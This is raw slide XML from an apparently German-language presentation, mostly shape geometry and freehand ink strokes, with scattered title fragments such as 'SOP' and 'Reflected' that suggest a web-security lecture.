                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F393A1F-CC90-4883-8905-C918C113063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Freihand 200">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9927834D-78D0-4BC5-8DD2-89B08A975643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842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365C7-BB21-4D3C-98BB-099DF91D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rescue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>!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9DABF-17EA-483C-9842-E3ECAE1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2141866"/>
            <a:ext cx="7829550" cy="71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E695E7-E151-4FD1-9853-27794BBB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802" y="3953750"/>
            <a:ext cx="6715125" cy="2247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C7B1B5-C687-4002-980E-E7CA70177826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2498835" y="3307419"/>
            <a:ext cx="360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/coiframe.html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D6BD763-C797-4126-B46C-F9CDEFC0E07E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3295087" y="3630584"/>
            <a:ext cx="1529162" cy="283780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1529162"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 283780"/>
              <a:gd name="connsiteX1" fmla="*/ 494429 w 1529162"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 283780"/>
              <a:gd name="connsiteX2" fmla="*/ 958275 w 1529162"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 283780"/>
              <a:gd name="connsiteX3" fmla="*/ 1529162 w 1529162"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 283780"/>
              <a:gd name="connsiteX4" fmla="*/ 1529162 w 1529162"/>
              <a:gd name="connsiteY4" fmla="*/ 283780 h 283780"/>
              <a:gd name="connsiteX5" fmla="*/ 1050025 w 1529162"/>
              <a:gd name="connsiteY5" fmla="*/ 283780 h 283780"/>
              <a:gd name="connsiteX6" fmla="*/ 509721 w 1529162"/>
              <a:gd name="connsiteY6" fmla="*/ 283780 h 283780"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 1529162"/>
              <a:gd name="connsiteY7" fmla="*/ 283780 h 283780"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 1529162"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 28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9162" h="283780" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="246424" y="7327"/>
                  <a:pt x="316199" y="-2355"/>
                  <a:pt x="494429" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="672659" y="2355"/>
                  <a:pt x="751185" y="282"/>
                  <a:pt x="958275" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1165365" y="-282"/>
                  <a:pt x="1345046" y="-18935"/>
                  <a:pt x="1529162" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1523666" y="108252"/>
                  <a:pt x="1518429" y="206250"/>
                  <a:pt x="1529162" y="283780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1421348" y="304319"/>
                  <a:pt x="1186011" y="293579"/>
                  <a:pt x="1050025" y="283780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="914039" y="273981"/>
                  <a:pt x="689610" y="276054"/>
                  <a:pt x="509721" y="283780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="329832" y="291506"/>
                  <a:pt x="135533" y="266179"/>
                  <a:pt x="0" y="283780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-852" y="164261"/>
                  <a:pt x="2538" y="103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B6322F-559B-40B4-83FA-9612BCABF0E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5481238" y="4876050"/>
            <a:ext cx="2422541" cy="252999"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2422541"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 252999"/>
              <a:gd name="connsiteX1" fmla="*/ 581410 w 2422541"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 252999"/>
              <a:gd name="connsiteX2" fmla="*/ 1114369 w 2422541"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 252999"/>
              <a:gd name="connsiteX3" fmla="*/ 1768455 w 2422541"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 252999"/>
              <a:gd name="connsiteX4" fmla="*/ 2422541 w 2422541"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 252999"/>
              <a:gd name="connsiteX5" fmla="*/ 2422541 w 2422541"/>
              <a:gd name="connsiteY5" fmla="*/ 252999 h 252999"/>
              <a:gd name="connsiteX6" fmla="*/ 1865357 w 2422541"/>
              <a:gd name="connsiteY6" fmla="*/ 252999 h 252999"/>
              <a:gd name="connsiteX7" fmla="*/ 1308172 w 2422541"/>
              <a:gd name="connsiteY7" fmla="*/ 252999 h 252999"/>
              <a:gd name="connsiteX8" fmla="*/ 654086 w 2422541"/>
              <a:gd name="connsiteY8" fmla="*/ 252999 h 252999"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 2422541"/>
              <a:gd name="connsiteY9" fmla="*/ 252999 h 252999"/>
              <a:gd name="connsiteX10" fmla="*/ 0 w 2422541"/>
              <a:gd name="connsiteY10" fmla="*/ 0 h 2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2541" h="252999" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="210055" y="23782"/>
                  <a:pt x="330845" y="-25093"/>
                  <a:pt x="581410" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="831975" y="25093"/>
                  <a:pt x="899547" y="26158"/>
                  <a:pt x="1114369" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1329191" y="-26158"/>
                  <a:pt x="1587772" y="25151"/>
                  <a:pt x="1768455" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1949138" y="-25151"/>
                  <a:pt x="2183230" y="-4493"/>
                  <a:pt x="2422541" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2433323" y="108301"/>
                  <a:pt x="2415917" y="133653"/>
                  <a:pt x="2422541" y="252999"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2250469" y="238702"/>
                  <a:pt x="2104641" y="257718"/>
                  <a:pt x="1865357" y="252999"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1626073" y="248280"/>
                  <a:pt x="1584433" y="251575"/>
                  <a:pt x="1308172" y="252999"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1031911" y="254423"/>
                  <a:pt x="834342" y="257387"/>
                  <a:pt x="654086" y="252999"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="473830" y="248611"/>
                  <a:pt x="218476" y="237674"/>
                  <a:pt x="0" y="252999"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3584" y="143037"/>
                  <a:pt x="11832" y="88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32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9510" cy="1325563"/>
          </a:xfrm>
        </p:spPr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SOP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chapter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>?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993016"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="60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63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4065654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itel 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F45A1A35-8585-4E0F-8173-62951364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404" y="365125"/>
            <a:ext cx="6886636" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Reflected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7607C94-DAD3-468A-8795-4292A0891A71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6467494" y="4674860"/>
            <a:ext cx="57392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not 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just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„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reflected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“ back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user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D4CE603-A673-497E-9A02-7232103B4CE8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481EF7BC-56AB-49DF-9168-99541C5C782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C6DF9B6C-AF88-4117-BE7C-BE3E509C342B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6353431-2C8E-4E17-98A8-F575B0C81D98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="2814200">
            <a:off x="574889" y="1950446"/>
            <a:ext cx="336960" cy="214560"/>
            <a:chOff x="2721526" y="1425194"/>
            <a:chExt cx="336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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2721526" y="1425194"/>
                <a:ext cx="201600" cy="21456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41ED303C-B50E-4770-82F1-7C69D01A031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712886" y="1416554"/>
                  <a:ext cx="21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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3031126" y="1617794"/>
                <a:ext cx="27360" cy="468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6D9FDB5-AE1C-40FA-95D6-7524226AAB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2486" y="1608794"/>
                  <a:ext cx="4500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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="11392512" y="2816594"/>
              <a:ext cx="360" cy="3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DB56F79F-5F4A-4DB4-A8F4-5CAC30154DFC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1383512" y="280759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FD42984-1DF0-482E-9162-40CA94F24DAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4959286" y="2641634"/>
            <a:ext cx="824760" cy="263160"/>
            <a:chOff x="4959286" y="2641634"/>
            <a:chExt cx="82476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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4959286" y="2721554"/>
                <a:ext cx="126720" cy="183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BB64F29C-5F88-487E-9CA2-949F087D30B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50286" y="2712554"/>
                  <a:ext cx="144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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5160886" y="2885354"/>
                <a:ext cx="14040" cy="13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60DD9D7F-8B17-4778-B26D-3DF76EFA67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2246" y="2876354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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5281126" y="2721194"/>
                <a:ext cx="21600" cy="10800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1D15EAE0-765A-4A78-BAE1-A7D162C529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2486" y="2712554"/>
                  <a:ext cx="3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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5273566" y="2641634"/>
                <a:ext cx="208440" cy="1666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5E4DBDA7-9033-4607-871B-9507C23EF41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64566" y="2632634"/>
                  <a:ext cx="226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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5483086" y="2675834"/>
                <a:ext cx="139320" cy="896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BE7FBDEF-6D50-4B2C-A17C-467AF58D025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4086" y="2667194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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5633566" y="2662154"/>
                <a:ext cx="150480" cy="17460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898221B-D0D5-48C5-9A0D-8E40CA910A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24566" y="2653154"/>
                  <a:ext cx="1681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286C256F-FB33-4FF8-9BE2-19B7E4B2A50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5905726" y="2610674"/>
            <a:ext cx="1387800" cy="268560"/>
            <a:chOff x="5905726" y="2610674"/>
            <a:chExt cx="13878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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5905726" y="2665034"/>
                <a:ext cx="8280" cy="8748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01598933-2F45-44F6-B6B4-1CCAFB4DBCF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96726" y="2656394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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5906446" y="2621474"/>
                <a:ext cx="27000" cy="792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F41CA87-C7F1-44D3-AA93-98E425BF19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7446" y="2612834"/>
                  <a:ext cx="446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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5978806" y="2643794"/>
                <a:ext cx="113760" cy="11304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A10A63DA-9D41-45B5-95D7-FFED72E0735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70166" y="263515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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6137926" y="2669354"/>
                <a:ext cx="113400" cy="770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84B86A3B-4C4F-42C9-924D-3B91710B62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129286" y="2660714"/>
                  <a:ext cx="131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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6301006" y="2610674"/>
                <a:ext cx="55080" cy="1332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7D318A45-BC41-4CBA-8177-4C3188B162C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92366" y="2601674"/>
                  <a:ext cx="72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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6398566" y="2756834"/>
                <a:ext cx="11880" cy="6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E821DBE4-B0B8-43C4-9E7C-3D70C4A5BEE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89566" y="274783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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6460486" y="2695994"/>
                <a:ext cx="47160" cy="14688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5A21A807-5845-4BF2-B3ED-DFEAD5C580C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51846" y="2686994"/>
                  <a:ext cx="64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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6479926" y="2703914"/>
                <a:ext cx="105120" cy="7200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C0E890B-A878-4A89-BD0D-239D84F81C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70926" y="2694914"/>
                  <a:ext cx="122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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6607726" y="2726594"/>
                <a:ext cx="70560" cy="597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3AEA8A9-2E75-406C-8DF0-BE3C11968A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98726" y="2717594"/>
                  <a:ext cx="88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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6671806" y="2721914"/>
                <a:ext cx="29520" cy="84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450A7ABC-7DC1-4FC0-BBDD-91714469EE4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63166" y="2712914"/>
                  <a:ext cx="47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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6744166" y="2741354"/>
                <a:ext cx="57960" cy="4860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0944C4D0-26A4-4022-9ECC-4D97E7B6530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35526" y="2732714"/>
                  <a:ext cx="75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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6720406" y="2761154"/>
                <a:ext cx="105120" cy="11592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5FA0954B-1273-4E7B-B323-0B1DDB9CC76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11766" y="2752154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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6853966" y="2695634"/>
                <a:ext cx="72360" cy="11880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A0F15A1A-EB35-495C-87FD-A762469539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5326" y="2686994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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6933526" y="2775914"/>
                <a:ext cx="91080" cy="4644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E32B135A-D4E6-469D-802D-BF3C7B12F3F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924526" y="2767274"/>
                  <a:ext cx="108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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7042966" y="2786714"/>
                <a:ext cx="84600" cy="8604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224799D9-D01B-4859-A968-321DAEE88E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33966" y="2778074"/>
                  <a:ext cx="102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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7158526" y="2811194"/>
                <a:ext cx="89640" cy="6804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5410EA62-1B58-4891-9D8B-DCD8840595A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886" y="2802554"/>
                  <a:ext cx="107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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7263646" y="2741354"/>
                <a:ext cx="29880" cy="12636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F5FD7754-F517-45BD-B4AA-464708E264E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54646" y="2732714"/>
                  <a:ext cx="475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C680B792-8BD2-4360-8C7D-93BE15F8D760}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10105512" y="3017474"/>
            <a:ext cx="194040" cy="184680"/>
            <a:chOff x="9832246" y="3017474"/>
            <a:chExt cx="1940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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9832246" y="3017474"/>
                <a:ext cx="99360" cy="18252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8F6E924A-1790-4377-842D-631D72B3E1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823246" y="3008834"/>
                  <a:ext cx="117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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10017646" y="3190274"/>
                <a:ext cx="8640" cy="1188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624B4FC6-8A1B-4A81-93AC-D860D6686B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009006" y="3181634"/>
                  <a:ext cx="26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608AB3B-BCAC-49DC-B631-2DAC30B9883B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10349232" y="2942234"/>
            <a:ext cx="1729800" cy="239400"/>
            <a:chOff x="10075966" y="2942234"/>
            <a:chExt cx="17298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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10075966" y="3073274"/>
                <a:ext cx="105120" cy="108360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="134" name="Freihand 133">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D62FAF4E-6A3B-4C5B-AFD3-A7FAAD1EAA3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067326" y="3064274"/>
                  <a:ext cx="122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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10219606" y="3085874"/>
                <a:ext cx="143640" cy="928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CE8D1DE2-2E0A-4397-AFE8-BD7D3862392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10606" y="3077234"/>
                  <a:ext cx="161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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10399246" y="2992634"/>
                <a:ext cx="103680" cy="170640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="136" name="Freihand 135">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9409F6C6-FEAE-4A6A-A439-3D3EE507F0D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0606" y="2983634"/>
                  <a:ext cx="1213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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10553686" y="3084074"/>
                <a:ext cx="77400" cy="82440"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="137" name="Freihand 136">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DCA1DB2-5202-4A4F-A405-549276F6DC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046" y="3075074"/>
                  <a:ext cx="95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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10654126" y="3003434"/>
                <a:ext cx="174960" cy="1544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4C2AC053-2943-4F58-B78B-AE989DD8548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645126" y="2994434"/>
                  <a:ext cx="192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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10932046" y="3043394"/>
                <a:ext cx="106560" cy="130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780F7A66-8803-4CD7-B26B-31F99552198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23046" y="3034394"/>
                  <a:ext cx="12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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11081806" y="3038354"/>
                <a:ext cx="77400" cy="7704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8EEC4576-147B-4223-96F9-4CB4EEF4234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72806" y="3029354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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11169286" y="3053474"/>
                <a:ext cx="16560" cy="68040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="143" name="Freihand 142">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08207BC9-F8D4-4A1E-8D7D-C1716367A67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160646" y="3044474"/>
                  <a:ext cx="34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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11220406" y="3044834"/>
                <a:ext cx="62280" cy="3960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1BA779DC-9A46-40F5-8E4D-1C99F487322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211406" y="3035834"/>
                  <a:ext cx="79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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11216446" y="3055634"/>
                <a:ext cx="93600" cy="12060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53059599-EAF6-4744-BF3E-18B6E6898EC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7446" y="3046994"/>
                  <a:ext cx="11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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11344246" y="2948714"/>
                <a:ext cx="70560" cy="1616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749C88E7-C66E-48A5-90B1-425C26737A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335246" y="2940074"/>
                  <a:ext cx="88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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11414086" y="3046634"/>
                <a:ext cx="86040" cy="6480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0C6B4231-BE2A-40F2-B611-A6BA029E2F2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405446" y="3037634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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11554126" y="3038714"/>
                <a:ext cx="63360" cy="5940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C8961D64-6F35-4DDF-A09C-C6677E4D6D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545126" y="3029714"/>
                  <a:ext cx="81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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11616046" y="3052034"/>
                <a:ext cx="50760" cy="763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17757810-B29B-455D-B410-0BF2FCDB0F8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607046" y="3043034"/>
                  <a:ext cx="68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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11666446" y="3048434"/>
                <a:ext cx="84600" cy="72360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="151" name="Freihand 150">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95F6241A-E972-4262-86D8-F0C1BF40511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657806" y="3039434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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11747806" y="2942234"/>
                <a:ext cx="57960" cy="163800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="152" name="Freihand 151">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDA0CDED-A918-4A7F-B927-6DBCDEA5EE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738806" y="2933594"/>
                  <a:ext cx="7560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3F0BA190-5CFD-46F3-A381-95328ACE65ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5064046" y="3459194"/>
            <a:ext cx="233640" cy="161640"/>
            <a:chOff x="5064046" y="3459194"/>
            <a:chExt cx="233640" cy="16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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5064046" y="3459194"/>
                <a:ext cx="138240" cy="129240"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="154" name="Freihand 153">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB43EC7-031E-4272-87AE-47F3E896A79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55046" y="3450554"/>
                  <a:ext cx="155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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5149366" y="3507434"/>
                <a:ext cx="23760" cy="113400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="155" name="Freihand 154">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECA4AFF5-4A6D-457C-A614-D3A257BFEF7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40366" y="3498434"/>
                  <a:ext cx="41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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5285806" y="3598874"/>
                <a:ext cx="11880" cy="7200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="156" name="Freihand 155">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA0C55F7-83FE-4029-A8E3-DBB4A18CD37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76806" y="3590234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uppieren 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC1F305B-981E-4EC0-A5B8-E17E173C81BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5358886" y="3316634"/>
            <a:ext cx="2440080" cy="349920"/>
            <a:chOff x="5358886" y="3316634"/>
            <a:chExt cx="244008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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5358886" y="3529034"/>
